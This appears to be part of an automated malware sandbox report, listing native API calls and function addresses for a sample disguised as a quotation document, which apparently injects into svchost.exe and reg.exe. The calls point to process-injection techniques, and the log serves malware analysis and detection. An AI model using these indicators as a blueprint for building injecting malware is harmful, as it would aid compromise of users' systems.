                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A54340 NtSetContextThread,LdrInitializeThunk,3_2_03A54340
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A54650 NtSuspendThread,LdrInitializeThunk,3_2_03A54650
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03A52BA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03A52BE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03A52BF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52B60 NtClose,LdrInitializeThunk,3_2_03A52B60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52AF0 NtWriteFile,LdrInitializeThunk,3_2_03A52AF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52AD0 NtReadFile,LdrInitializeThunk,3_2_03A52AD0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52FB0 NtResumeThread,LdrInitializeThunk,3_2_03A52FB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52FE0 NtCreateFile,LdrInitializeThunk,3_2_03A52FE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52F30 NtCreateSection,LdrInitializeThunk,3_2_03A52F30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03A52E80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03A52EE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03A52DF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52DD0 NtDelayExecution,LdrInitializeThunk,3_2_03A52DD0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03A52D30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03A52D10
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03A52CA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52C60 NtCreateKey,LdrInitializeThunk,3_2_03A52C60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03A52C70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A535C0 NtCreateMutant,LdrInitializeThunk,3_2_03A535C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A539B0 NtGetContextThread,LdrInitializeThunk,3_2_03A539B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52B80 NtQueryInformationFile,3_2_03A52B80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52AB0 NtWaitForSingleObject,3_2_03A52AB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52FA0 NtQuerySection,3_2_03A52FA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52F90 NtProtectVirtualMemory,3_2_03A52F90
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52F60 NtCreateProcessEx,3_2_03A52F60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52EA0 NtAdjustPrivilegesToken,3_2_03A52EA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52E30 NtWriteVirtualMemory,3_2_03A52E30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52DB0 NtEnumerateKey,3_2_03A52DB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52D00 NtSetInformationFile,3_2_03A52D00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52CF0 NtOpenProcess,3_2_03A52CF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52CC0 NtQueryVirtualMemory,3_2_03A52CC0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A52C00 NtQueryInformationProcess,3_2_03A52C00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A53090 NtSetValueKey,3_2_03A53090
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A53010 NtOpenDirectoryObject,3_2_03A53010
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A53D10 NtOpenProcessToken,3_2_03A53D10
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A53D70 NtOpenThread,3_2_03A53D70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032D9370 NtReadFile,3_2_032D9370
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032D9200 NtCreateFile,3_2_032D9200
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032D9670 NtAllocateVirtualMemory,3_2_032D9670
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032D9500 NtClose,3_2_032D9500
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_032D9460 NtDeleteFile,3_2_032D9460
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C73DE2: CreateFileW,DeviceIoControl,CloseHandle,0_2_00C73DE2
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C68310
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C751BD
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C3D9750_2_00C3D975
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C321C50_2_00C321C5
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C462D20_2_00C462D2
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C4242E0_2_00C4242E
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C325FA0_2_00C325FA
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C266E10_2_00C266E1
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C1E6A00_2_00C1E6A0
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C6E6160_2_00C6E616
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C4878F0_2_00C4878F
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C788890_2_00C78889
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C468440_2_00C46844
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C908570_2_00C90857
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C288080_2_00C28808
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C3CB210_2_00C3CB21
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C46DB60_2_00C46DB6
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C26F9E0_2_00C26F9E
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C230300_2_00C23030
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C3F1D90_2_00C3F1D9
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C331870_2_00C33187
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C112870_2_00C11287
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C314840_2_00C31484
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C255200_2_00C25520
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C376960_2_00C37696
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C257600_2_00C25760
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C319780_2_00C31978
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C49AB50_2_00C49AB5
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C1FCE00_2_00C1FCE0
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C97DDB0_2_00C97DDB
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C31D900_2_00C31D90
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C3BDA60_2_00C3BDA6
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C23FE00_2_00C23FE0
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C1DF000_2_00C1DF00
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00E634F00_2_00E634F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004187E31_2_004187E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041001A1_2_0041001A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100231_2_00410023
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040282C1_2_0040282C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028301_2_00402830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031601_2_00403160
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011101_2_00401110
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004169DE1_2_004169DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004169E31_2_004169E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004102431_2_00410243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012601_2_00401260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E2331_2_0040E233
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3771_2_0040E377
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023201_2_00402320
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3831_2_0040E383
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C421_2_00402C42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C501_2_00402C50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040258D1_2_0040258D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025901_2_00402590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EEB31_2_0042EEB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C02C01_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F41A21_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037021AE1_2_037021AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D20001_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E44201_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEB891_2_036FEB89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364A8401_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E8F01_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036268B81_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F401_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03682F281_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660F301_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E2F301_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC81_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BEFA01_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEE261_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEEDB1_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652E901_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FCE931_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364AD001_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DCD1F1_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363ADE01_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03648DC01_2_03648DC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03658DBF1_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640C001_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630CF21_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036317EC1_2_036317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DD5B01_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036314601_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF43F1_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFB761_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B5BF01_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367DBF91_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FB801_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B3A6C1_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFA491_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7A461_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EDAC61_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DDAAC1_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E1AA31_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036499501_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B9501_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D59101_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036459901_2_03645990
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD8001_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036438E01_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFF091_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFFB11_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641F921_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03649EB01_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7D731_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F1D5A1_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FDC01_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B9C321_2_036B9C32
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AE03E63_2_03AE03E6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A2E3F03_2_03A2E3F0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADA3523_2_03ADA352
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AA02C03_2_03AA02C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AE21AE3_2_03AE21AE
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AE01AA3_2_03AE01AA
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD41A23_2_03AD41A2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD81CC3_2_03AD81CC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A101003_2_03A10100
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ABA1183_2_03ABA118
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AA81583_2_03AA8158
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AB20003_2_03AB2000
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A1C7C03_2_03A1C7C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A207703_2_03A20770
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A447503_2_03A44750
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A3C6E03_2_03A3C6E0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AE05913_2_03AE0591
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A205353_2_03A20535
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ACE4F63_2_03ACE4F6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AC44203_2_03AC4420
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD24463_2_03AD2446
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADEB893_2_03ADEB89
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD6BD73_2_03AD6BD7
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADAB403_2_03ADAB40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A1EA803_2_03A1EA80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A229A03_2_03A229A0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A369623_2_03A36962
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A068B83_2_03A068B8
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A4E8F03_2_03A4E8F0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A2A8403_2_03A2A840
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A9EFA03_2_03A9EFA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A12FC83_2_03A12FC8
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A62F283_2_03A62F28
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A40F303_2_03A40F30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AC2F303_2_03AC2F30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A94F403_2_03A94F40
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A32E903_2_03A32E90
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADCE933_2_03ADCE93
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADEEDB3_2_03ADEEDB
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADEE263_2_03ADEE26
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A38DBF3_2_03A38DBF
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A1ADE03_2_03A1ADE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A28DC03_2_03A28DC0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A2AD003_2_03A2AD00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ABCD1F3_2_03ABCD1F
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A10CF23_2_03A10CF2
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A20C003_2_03A20C00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD132D3_2_03AD132D
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A0D34C3_2_03A0D34C
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A252A03_2_03A252A0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AC12ED3_2_03AC12ED
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A3D2F03_2_03A3D2F0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A3B2C03_2_03A3B2C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A2B1B03_2_03A2B1B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AEB16B3_2_03AEB16B
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A5516C3_2_03A5516C
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A0F1723_2_03A0F172
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD70E93_2_03AD70E9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADF0E03_2_03ADF0E0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ACF0CC3_2_03ACF0CC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADF7B03_2_03ADF7B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A117EC3_2_03A117EC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD16CC3_2_03AD16CC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ABD5B03_2_03ABD5B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD75713_2_03AD7571
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADF43F3_2_03ADF43F
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A114603_2_03A11460
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A3FB803_2_03A3FB80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A95BF03_2_03A95BF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A5DBF93_2_03A5DBF9
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADFB763_2_03ADFB76
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ABDAAC3_2_03ABDAAC
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AC1AA33_2_03AC1AA3
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ACDAC63_2_03ACDAC6
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03A93A6C3_2_03A93A6C
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03ADFA493_2_03ADFA49
                Source: C:\Windows\SysWOW64\reg.exeCode function: 3_2_03AD7A463_2_03AD7A46
